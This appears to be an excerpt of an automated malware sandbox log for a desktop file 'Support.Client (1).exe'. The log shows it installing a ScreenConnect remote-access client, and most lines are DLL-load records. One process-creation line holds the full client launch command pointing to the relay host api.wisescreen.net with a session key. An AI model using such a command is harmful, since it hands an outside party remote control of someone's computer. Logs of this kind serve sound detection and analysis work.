Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User"
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System"

Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
